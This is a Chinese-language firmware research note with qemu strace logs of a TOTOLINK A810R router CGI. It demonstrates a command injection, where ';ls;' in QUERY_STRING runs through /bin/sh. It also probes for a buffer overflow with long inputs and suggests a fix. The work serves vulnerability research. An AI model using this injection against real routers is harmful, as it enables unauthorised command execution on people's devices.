strace 的调用

对 TOTOLINK A810R（固件 V4.1.2cu.5182_B20201026）的 downloadFlile.cgi 进行 strace

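qemu-user strace 的调用（QUERY_STRING 中带有 `;ls;`）。下方 execve 一行显示，QUERY_STRING 被未经转义地拼接进 `/bin/sh -c "echo QUERY_STRING:... >/tmp/download"`，随后出现了 ls 的目录列表，说明该 CGI 存在命令注入。修复方向：不要经由 shell 拼接外部输入，或对参数做严格的白名单校验。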
awigwu76@awigwu76:~/Desktop/Firmware/TOTOLink/A810R_V4.1.2cu.5182_B20201026/_TOTOLINK_C8180R-1C_A810R_IP04347_8197F_SPI_8M64M_V4.1.2cu.5182_B20201026_ALL.web.extracted/squashfs-root/web_cste/cgi-bin$ QUERY_STRING="payload=test;ls;" qemu-mipsel-static -strace -L ../../ ./downloadFlile.cgi
6937 mmap(NULL,4096,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANONYMOUS|MAP_UNINITIALIZED,-1,0) = 0x2b2ad000
6937 open("/lib/libcjson.so",O_RDONLY) = 3
6937 fstat(3,0x2b2a9d90) = 0
6937 mmap(NULL,4096,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANONYMOUS|MAP_UNINITIALIZED,-1,0) = 0x2b2ae000
6937 read(3,0x2b2ae000,4096) = 4096
6937 mmap(NULL,102400,PROT_NONE,MAP_PRIVATE|MAP_ANONYMOUS,-1,0) = 0x2b2c8000
6937 mmap(0x2b2c8000,36548,PROT_EXEC|PROT_READ,MAP_PRIVATE|MAP_FIXED,3,0) = 0x2b2c8000
6937 mmap(0x2b2e0000,4015,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_FIXED,3,0x8000) = 0x2b2e0000
6937 close(3) = 0
6937 munmap(0x2b2ae000,4096) = 0
6937 open("/lib/libgcc_s.so.1",O_RDONLY) = 3
6937 fstat(3,0x2b2a9d80) = 0
6937 mmap(NULL,4096,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANONYMOUS|MAP_UNINITIALIZED,-1,0) = 0x2b2ae000
6937 read(3,0x2b2ae000,4096) = 4096
6937 mmap(NULL,147456,PROT_NONE,MAP_PRIVATE|MAP_ANONYMOUS,-1,0) = 0x2b2e1000
6937 mmap(0x2b2e1000,78092,PROT_EXEC|PROT_READ,MAP_PRIVATE|MAP_FIXED,3,0) = 0x2b2e1000
6937 mmap(0x2b304000,3091,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_FIXED,3,0x13000) = 0x2b304000
6937 close(3) = 0
6937 munmap(0x2b2ae000,4096) = 0
6937 open("/lib/libc.so.0",O_RDONLY) = 3
6937 fstat(3,0x2b2a9d70) = 0
6937 mmap(NULL,4096,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANONYMOUS|MAP_UNINITIALIZED,-1,0) = 0x2b2ae000
6937 read(3,0x2b2ae000,4096) = 4096
6937 mmap(NULL,548864,PROT_NONE,MAP_PRIVATE|MAP_ANONYMOUS,-1,0) = 0x2b305000
6937 mmap(0x2b305000,449512,PROT_EXEC|PROT_READ,MAP_PRIVATE|MAP_FIXED,3,0) = 0x2b305000
6937 mmap(0x2b383000,7785,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_FIXED,3,0x6e000) = 0x2b383000
6937 mmap(0x2b385000,22908,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED,-1,0) = 0x2b385000
6937 close(3) = 0
6937 munmap(0x2b2ae000,4096) = 0
6937 open("/lib/libm.so.0",O_RDONLY) = 3
6937 fstat(3,0x2b2a9d60) = 0
6937 mmap(NULL,4096,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANONYMOUS|MAP_UNINITIALIZED,-1,0) = 0x2b2ae000
6937 read(3,0x2b2ae000,4096) = 4096
6937 mmap(NULL,159744,PROT_NONE,MAP_PRIVATE|MAP_ANONYMOUS,-1,0) = 0x2b38b000
6937 mmap(0x2b38b000,93516,PROT_EXEC|PROT_READ,MAP_PRIVATE|MAP_FIXED,3,0) = 0x2b38b000
6937 mmap(0x2b3b1000,3843,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_FIXED,3,0x16000) = 0x2b3b1000
6937 close(3) = 0
6937 munmap(0x2b2ae000,4096) = 0
6937 open("/lib/libgcc_s.so.1",O_RDONLY) = 3
6937 fstat(3,0x2b2a9d50) = 0
6937 close(3) = 0
6937 open("/lib/libc.so.0",O_RDONLY) = 3
6937 fstat(3,0x2b2a9d40) = 0
6937 close(3) = 0
6937 open("/lib/libc.so.0",O_RDONLY) = 3
6937 fstat(3,0x2b2a9d30) = 0
6937 close(3) = 0
6937 stat("/lib/ld-uClibc.so.0",0x2b2aa6c8) = 0
6937 open("/lib/libc.so.0",O_RDONLY) = 3
6937 fstat(3,0x2b2a9d10) = 0
6937 close(3) = 0
6937 mmap(NULL,4096,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANONYMOUS|MAP_UNINITIALIZED,-1,0) = 0x2b2ae000
6937 set_thread_area(0x2b2b5440) = 0
6937 open("/dev/urandom",O_RDONLY) = 3
6937 read(3,0x2b2aa80c,4) = 4
6937 close(3) = 0
6937 mprotect(0x2b383000,4096,PROT_READ) = 0
6937 mprotect(0x2b2c6000,4096,PROT_READ) = 0
6937 ioctl(0,TCGETS,0x2b2aa6a8) = 0 ({c_iflag = ICRNL|IXON|IUTF8,c_oflag = OPOST|ONLCR,c_cflag = B38400,CS8,CREAD,c_lflag = ISIG|ICANON|ECHO|ECHOE|ECHOK|ECHOCTL|ECHOKE|IEXTEN,c_cc = "",c_line = ''})
6937 ioctl(1,TCGETS,0x2b2aa6a8) = 0 ({c_iflag = ICRNL|IXON|IUTF8,c_oflag = OPOST|ONLCR,c_cflag = B38400,CS8,CREAD,c_lflag = ISIG|ICANON|ECHO|ECHOE|ECHOK|ECHOCTL|ECHOKE|IEXTEN,c_cc = "",c_line = ''})
6937 rt_sigaction(SIGINT,0x2b2a4a90,0x2b3898b0) = 0
6937 rt_sigaction(SIGQUIT,0x2b2a4a90,0x2b3898cc) = 0
6937 rt_sigprocmask(SIG_BLOCK,[SIGCHLD],0x2b2a4a60,16) = 0 (oldset=[])
6937 clone(CLONE_PARENT_SETTID|0x12,child_stack=0x00000000,parent_tidptr=0x2b2a4a5c,tls=0x00000000,child_tidptr=0x2b38c3f0) = 6939
6937 wait4(6939,0x2b2a4a58,0,(nil)) = 0
6939 rt_sigaction(SIGINT,0x2b3898b0,NULL) = 0
6939 rt_sigaction(SIGQUIT,0x2b3898cc,NULL) = 0
6939 rt_sigprocmask(SIG_SETMASK,[],NULL,16) = 0
6939 execve("/bin/sh",{"/bin/sh","-c","echo QUERY_STRING:payload=test;ls; >/tmp/download",NULL})QUERY_STRING:payload=test
cstecgi.cgi ExportSettings.sh upload_bootloader.cgi
downloadFlile.cgi ExportSyslog.sh upload.cgi
ExportIbmsConfig.sh product.ini upload_settings.cgi

6937 rt_sigaction(SIGINT,0x2b3898b0,NULL) = 0
6937 rt_sigaction(SIGQUIT,0x2b3898cc,NULL) = 0
6937 rt_sigprocmask(SIG_SETMASK,[],NULL,16) = 0
--- SIGSEGV {si_signo=SIGSEGV, si_code=1, si_addr=NULL} ---
qemu: uncaught target signal 11 (Segmentation fault) - core dumped
段错误
# 无缓冲区溢出（QUERY_STRING 为 400 个 'a'）
awigwu76@awigwu76:~/Desktop/Firmware/TOTOLink/A810R_V4.1.2cu.5182_B20201026/_TOTOLINK_C8180R-1C_A810R_IP04347_8197F_SPI_8M64M_V4.1.2cu.5182_B20201026_ALL.web.extracted/squashfs-root/web_cste/cgi-bin$ qemu-mipsel-static -strace -L ../../ -E QUERY_STRING=$(printf 'a%.0s' {1..400}) ./downloadFlile.cgi
7692 mmap(NULL,4096,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANONYMOUS|MAP_UNINITIALIZED,-1,0) = 0x2b2ad000
7692 open("/lib/libcjson.so",O_RDONLY) = 3
7692 fstat(3,0x2b2a9c00) = 0
7692 mmap(NULL,4096,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANONYMOUS|MAP_UNINITIALIZED,-1,0) = 0x2b2ae000
7692 read(3,0x2b2ae000,4096) = 4096
7692 mmap(NULL,102400,PROT_NONE,MAP_PRIVATE|MAP_ANONYMOUS,-1,0) = 0x2b2c8000
7692 mmap(0x2b2c8000,36548,PROT_EXEC|PROT_READ,MAP_PRIVATE|MAP_FIXED,3,0) = 0x2b2c8000
7692 mmap(0x2b2e0000,4015,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_FIXED,3,0x8000) = 0x2b2e0000
7692 close(3) = 0
7692 munmap(0x2b2ae000,4096) = 0
7692 open("/lib/libgcc_s.so.1",O_RDONLY) = 3
7692 fstat(3,0x2b2a9bf0) = 0
7692 mmap(NULL,4096,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANONYMOUS|MAP_UNINITIALIZED,-1,0) = 0x2b2ae000
7692 read(3,0x2b2ae000,4096) = 4096
7692 mmap(NULL,147456,PROT_NONE,MAP_PRIVATE|MAP_ANONYMOUS,-1,0) = 0x2b2e1000
7692 mmap(0x2b2e1000,78092,PROT_EXEC|PROT_READ,MAP_PRIVATE|MAP_FIXED,3,0) = 0x2b2e1000
7692 mmap(0x2b304000,3091,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_FIXED,3,0x13000) = 0x2b304000
7692 close(3) = 0
7692 munmap(0x2b2ae000,4096) = 0
7692 open("/lib/libc.so.0",O_RDONLY) = 3
7692 fstat(3,0x2b2a9be0) = 0
7692 mmap(NULL,4096,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANONYMOUS|MAP_UNINITIALIZED,-1,0) = 0x2b2ae000
7692 read(3,0x2b2ae000,4096) = 4096
7692 mmap(NULL,548864,PROT_NONE,MAP_PRIVATE|MAP_ANONYMOUS,-1,0) = 0x2b305000
7692 mmap(0x2b305000,449512,PROT_EXEC|PROT_READ,MAP_PRIVATE|MAP_FIXED,3,0) = 0x2b305000
7692 mmap(0x2b383000,7785,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_FIXED,3,0x6e000) = 0x2b383000
7692 mmap(0x2b385000,22908,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED,-1,0) = 0x2b385000
7692 close(3) = 0
7692 munmap(0x2b2ae000,4096) = 0
7692 open("/lib/libm.so.0",O_RDONLY) = 3
7692 fstat(3,0x2b2a9bd0) = 0
7692 mmap(NULL,4096,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANONYMOUS|MAP_UNINITIALIZED,-1,0) = 0x2b2ae000
7692 read(3,0x2b2ae000,4096) = 4096
7692 mmap(NULL,159744,PROT_NONE,MAP_PRIVATE|MAP_ANONYMOUS,-1,0) = 0x2b38b000
7692 mmap(0x2b38b000,93516,PROT_EXEC|PROT_READ,MAP_PRIVATE|MAP_FIXED,3,0) = 0x2b38b000
7692 mmap(0x2b3b1000,3843,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_FIXED,3,0x16000) = 0x2b3b1000
7692 close(3) = 0
7692 munmap(0x2b2ae000,4096) = 0
7692 open("/lib/libgcc_s.so.1",O_RDONLY) = 3
7692 fstat(3,0x2b2a9bc0) = 0
7692 close(3) = 0
7692 open("/lib/libc.so.0",O_RDONLY) = 3
7692 fstat(3,0x2b2a9bb0) = 0
7692 close(3) = 0
7692 open("/lib/libc.so.0",O_RDONLY) = 3
7692 fstat(3,0x2b2a9ba0) = 0
7692 close(3) = 0
7692 stat("/lib/ld-uClibc.so.0",0x2b2aa538) = 0
7692 open("/lib/libc.so.0",O_RDONLY) = 3
7692 fstat(3,0x2b2a9b80) = 0
7692 close(3) = 0
7692 mmap(NULL,4096,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANONYMOUS|MAP_UNINITIALIZED,-1,0) = 0x2b2ae000
7692 set_thread_area(0x2b2b5440) = 0
7692 open("/dev/urandom",O_RDONLY) = 3
7692 read(3,0x2b2aa67c,4) = 4
7692 close(3) = 0
7692 mprotect(0x2b383000,4096,PROT_READ) = 0
7692 mprotect(0x2b2c6000,4096,PROT_READ) = 0
7692 ioctl(0,TCGETS,0x2b2aa518) = 0 ({c_iflag = ICRNL|IXON|IUTF8,c_oflag = OPOST|ONLCR,c_cflag = B38400,CS8,CREAD,c_lflag = ISIG|ICANON|ECHO|ECHOE|ECHOK|ECHOCTL|ECHOKE|IEXTEN,c_cc = "",c_line = ''})
7692 ioctl(1,TCGETS,0x2b2aa518) = 0 ({c_iflag = ICRNL|IXON|IUTF8,c_oflag = OPOST|ONLCR,c_cflag = B38400,CS8,CREAD,c_lflag = ISIG|ICANON|ECHO|ECHOE|ECHOK|ECHOCTL|ECHOKE|IEXTEN,c_cc = "",c_line = ''})
7692 rt_sigaction(SIGINT,0x2b2a4900,0x2b3898b0) = 0
7692 rt_sigaction(SIGQUIT,0x2b2a4900,0x2b3898cc) = 0
7692 rt_sigprocmask(SIG_BLOCK,[SIGCHLD],0x2b2a48d0,16) = 0 (oldset=[])
7692 clone(CLONE_PARENT_SETTID|0x12,child_stack=0x00000000,parent_tidptr=0x2b2a48cc,tls=0x00000000,child_tidptr=0x2b38c3f0) = 7694
7692 wait4(7694,0x2b2a48c8,0,(nil)) = 0
7694 rt_sigaction(SIGINT,0x2b3898b0,NULL) = 0
7694 rt_sigaction(SIGQUIT,0x2b3898cc,NULL) = 0
7694 rt_sigprocmask(SIG_SETMASK,[],NULL,16) = 0
7694 execve("/bin/sh",{"/bin/sh","-c","echo QUERY_STRING:aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa >/tmp/download",NULL}) = 
7692 rt_sigaction(SIGINT,0x2b3898b0,NULL) = 0
7692 rt_sigaction(SIGQUIT,0x2b3898cc,NULL) = 0
7692 rt_sigprocmask(SIG_SETMASK,[],NULL,16) = 0
--- SIGSEGV {si_signo=SIGSEGV, si_code=1, si_addr=0x00000001} ---
qemu: uncaught target signal 11 (Segmentation fault) - core dumped
段错误


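# 有缓冲区溢出（QUERY_STRING 为 600 个 'a'）。注意：此处的 strace 输出与上面 400 字节的运行一致，都以 SIGSEGV 结束且 si_addr=0x00000001，仅凭系统调用跟踪无法确认溢出，需结合调试器中崩溃时的寄存器和栈内容来判断。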
awigwu76@awigwu76:~/Desktop/Firmware/TOTOLink/A810R_V4.1.2cu.5182_B20201026/_TOTOLINK_C8180R-1C_A810R_IP04347_8197F_SPI_8M64M_V4.1.2cu.5182_B20201026_ALL.web.extracted/squashfs-root/web_cste/cgi-bin$ qemu-mipsel-static -strace -L ../../ -E QUERY_STRING=$(printf 'a%.0s' {1..600}) ./downloadFlile.cgi
7697 mmap(NULL,4096,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANONYMOUS|MAP_UNINITIALIZED,-1,0) = 0x2b2ad000
7697 open("/lib/libcjson.so",O_RDONLY) = 3
7697 fstat(3,0x2b2a9b40) = 0
7697 mmap(NULL,4096,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANONYMOUS|MAP_UNINITIALIZED,-1,0) = 0x2b2ae000
7697 read(3,0x2b2ae000,4096) = 4096
7697 mmap(NULL,102400,PROT_NONE,MAP_PRIVATE|MAP_ANONYMOUS,-1,0) = 0x2b2c8000
7697 mmap(0x2b2c8000,36548,PROT_EXEC|PROT_READ,MAP_PRIVATE|MAP_FIXED,3,0) = 0x2b2c8000
7697 mmap(0x2b2e0000,4015,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_FIXED,3,0x8000) = 0x2b2e0000
7697 close(3) = 0
7697 munmap(0x2b2ae000,4096) = 0
7697 open("/lib/libgcc_s.so.1",O_RDONLY) = 3
7697 fstat(3,0x2b2a9b30) = 0
7697 mmap(NULL,4096,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANONYMOUS|MAP_UNINITIALIZED,-1,0) = 0x2b2ae000
7697 read(3,0x2b2ae000,4096) = 4096
7697 mmap(NULL,147456,PROT_NONE,MAP_PRIVATE|MAP_ANONYMOUS,-1,0) = 0x2b2e1000
7697 mmap(0x2b2e1000,78092,PROT_EXEC|PROT_READ,MAP_PRIVATE|MAP_FIXED,3,0) = 0x2b2e1000
7697 mmap(0x2b304000,3091,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_FIXED,3,0x13000) = 0x2b304000
7697 close(3) = 0
7697 munmap(0x2b2ae000,4096) = 0
7697 open("/lib/libc.so.0",O_RDONLY) = 3
7697 fstat(3,0x2b2a9b20) = 0
7697 mmap(NULL,4096,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANONYMOUS|MAP_UNINITIALIZED,-1,0) = 0x2b2ae000
7697 read(3,0x2b2ae000,4096) = 4096
7697 mmap(NULL,548864,PROT_NONE,MAP_PRIVATE|MAP_ANONYMOUS,-1,0) = 0x2b305000
7697 mmap(0x2b305000,449512,PROT_EXEC|PROT_READ,MAP_PRIVATE|MAP_FIXED,3,0) = 0x2b305000
7697 mmap(0x2b383000,7785,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_FIXED,3,0x6e000) = 0x2b383000
7697 mmap(0x2b385000,22908,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED,-1,0) = 0x2b385000
7697 close(3) = 0
7697 munmap(0x2b2ae000,4096) = 0
7697 open("/lib/libm.so.0",O_RDONLY) = 3
7697 fstat(3,0x2b2a9b10) = 0
7697 mmap(NULL,4096,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANONYMOUS|MAP_UNINITIALIZED,-1,0) = 0x2b2ae000
7697 read(3,0x2b2ae000,4096) = 4096
7697 mmap(NULL,159744,PROT_NONE,MAP_PRIVATE|MAP_ANONYMOUS,-1,0) = 0x2b38b000
7697 mmap(0x2b38b000,93516,PROT_EXEC|PROT_READ,MAP_PRIVATE|MAP_FIXED,3,0) = 0x2b38b000
7697 mmap(0x2b3b1000,3843,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_FIXED,3,0x16000) = 0x2b3b1000
7697 close(3) = 0
7697 munmap(0x2b2ae000,4096) = 0
7697 open("/lib/libgcc_s.so.1",O_RDONLY) = 3
7697 fstat(3,0x2b2a9b00) = 0
7697 close(3) = 0
7697 open("/lib/libc.so.0",O_RDONLY) = 3
7697 fstat(3,0x2b2a9af0) = 0
7697 close(3) = 0
7697 open("/lib/libc.so.0",O_RDONLY) = 3
7697 fstat(3,0x2b2a9ae0) = 0
7697 close(3) = 0
7697 stat("/lib/ld-uClibc.so.0",0x2b2aa478) = 0
7697 open("/lib/libc.so.0",O_RDONLY) = 3
7697 fstat(3,0x2b2a9ac0) = 0
7697 close(3) = 0
7697 mmap(NULL,4096,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANONYMOUS|MAP_UNINITIALIZED,-1,0) = 0x2b2ae000
7697 set_thread_area(0x2b2b5440) = 0
7697 open("/dev/urandom",O_RDONLY) = 3
7697 read(3,0x2b2aa5bc,4) = 4
7697 close(3) = 0
7697 mprotect(0x2b383000,4096,PROT_READ) = 0
7697 mprotect(0x2b2c6000,4096,PROT_READ) = 0
7697 ioctl(0,TCGETS,0x2b2aa458) = 0 ({c_iflag = ICRNL|IXON|IUTF8,c_oflag = OPOST|ONLCR,c_cflag = B38400,CS8,CREAD,c_lflag = ISIG|ICANON|ECHO|ECHOE|ECHOK|ECHOCTL|ECHOKE|IEXTEN,c_cc = "",c_line = ''})
7697 ioctl(1,TCGETS,0x2b2aa458) = 0 ({c_iflag = ICRNL|IXON|IUTF8,c_oflag = OPOST|ONLCR,c_cflag = B38400,CS8,CREAD,c_lflag = ISIG|ICANON|ECHO|ECHOE|ECHOK|ECHOCTL|ECHOKE|IEXTEN,c_cc = "",c_line = ''})
7697 rt_sigaction(SIGINT,0x2b2a4840,0x2b3898b0) = 0
7697 rt_sigaction(SIGQUIT,0x2b2a4840,0x2b3898cc) = 0
7697 rt_sigprocmask(SIG_BLOCK,[SIGCHLD],0x2b2a4810,16) = 0 (oldset=[])
7697 clone(CLONE_PARENT_SETTID|0x12,child_stack=0x00000000,parent_tidptr=0x2b2a480c,tls=0x00000000,child_tidptr=0x2b38c3f0) = 7699
7697 wait4(7699,0x2b2a4808,0,(nil)) = 0
7699 rt_sigaction(SIGINT,0x2b3898b0,NULL) = 0
7699 rt_sigaction(SIGQUIT,0x2b3898cc,NULL) = 0
7699 rt_sigprocmask(SIG_SETMASK,[],NULL,16) = 0
7699 execve("/bin/sh",{"/bin/sh","-c","echo QUERY_STRING:aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa >/tmp/download",NULL}) = 
7697 rt_sigaction(SIGINT,0x2b3898b0,NULL) = 0
7697 rt_sigaction(SIGQUIT,0x2b3898cc,NULL) = 0
7697 rt_sigprocmask(SIG_SETMASK,[],NULL,16) = 0
--- SIGSEGV {si_signo=SIGSEGV, si_code=1, si_addr=0x00000001} ---
qemu: uncaught target signal 11 (Segmentation fault) - core dumped
段错误

#### 分析 strace 过程中的内存调用以及 orw（open/read/write）